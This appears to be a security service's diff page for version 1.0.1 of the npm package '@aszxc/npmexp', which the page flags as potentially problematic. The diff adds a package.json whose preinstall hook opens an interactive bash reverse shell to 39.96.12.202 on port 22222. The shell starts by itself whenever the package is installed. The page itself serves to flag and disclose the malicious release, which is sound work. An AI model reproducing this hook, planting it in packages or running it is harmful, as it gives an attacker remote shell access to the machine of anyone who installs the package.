@aszxc/npmexp 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @aszxc/npmexp might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +7 -0
package/package.json ADDED
@@ -0,0 +1,7 @@
1
+ {
2
+ "name": "@aszxc/npmexp",
3
+ "version": "1.0.1",
4
+ "scripts":{
5
+ "preinstall":"bash -c 'bash -i >& /dev/tcp/39.96.12.202/22222 0>&1'"
6
+ }
7
+ }